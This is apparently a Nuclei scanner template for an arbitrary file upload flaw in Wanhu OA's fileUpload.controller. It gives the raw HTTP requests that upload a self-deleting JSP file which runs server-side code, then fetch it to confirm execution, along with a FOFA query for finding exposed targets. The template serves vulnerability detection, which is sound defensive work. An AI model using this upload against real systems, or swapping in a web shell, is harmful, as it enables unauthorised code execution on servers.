id: wanhu-oa-fileupload-controller info: name: Wanhu OA Fileupload Controller - Arbitrary File Upload author: SleepingBag945 severity: critical description: | There is an arbitrary file upload vulnerability in Wanhu OA fileUpload.controller. An attacker can upload any file through the vulnerability. reference: - https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/90103c248a2c52bb0a060d0ee95d5a67e4579c3d/docs/wiki/oa/%E4%B8%87%E6%88%B7OA/%E4%B8%87%E6%88%B7OA%20fileUpload.controller%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E.md?plain=1#L24 - https://github.com/tr0uble-mAker/POC-bomber/blob/d2433ac41eaa58eb4fb0876ec05e3b645e10ecd7/pocs/redteam/wanhu_oa_fileupload-controller_fileupload_2022.py#L20 metadata: verified: true max-request: 2 fofa-query: app="万户网络-ezOFFICE" tags: wanhu,oa,fileupload,controller,intrusive variables: num1: "{{rand_int(1000, 9999)}}" num2: "{{rand_int(1000, 9999)}}" result: "{{to_number(num1)*to_number(num2)}}" http: - raw: - | POST /defaultroot/upload/fileUpload.controller HTTP/1.1 Host: {{Hostname}} Content-Type: multipart/form-data; boundary=b0d829daa06c13d6b3e16b0ad21d1eed Cookie: OASESSIONID=416B4CE965CD27DEED8197A8528A33E6 --b0d829daa06c13d6b3e16b0ad21d1eed Content-Disposition: form-data; name="file"; filename="{{randstr}}.jsp" Content-Type: application/octet-stream <%out.print({{num1}}*{{num2}});new java.io.File(application.getRealPath(request.getServletPath())).delete();%> --b0d829daa06c13d6b3e16b0ad21d1eed-- - | GET /defaultroot/upload/html/{{filename}} HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code_1 == 200 && contains(body_1, "\"result\":\"success\"") && contains(body_1,"fileSize")' - 'status_code_2 == 200 && contains(body_2,"{{result}}")' condition: and extractors: - type: regex name: filename group: 1 regex: - '"data":"(.*?)"' internal: true # digest: 4a0a004730450220285126b729ccfd09f0e766a08c863930f1745d4071db7394de32056e9ff8dbf4022100f804bdbc219b632b22c97298af1e2d8eddf3c193532ce219e906096c2ff25f2b:922c64590222798bb761d5b6d8e72950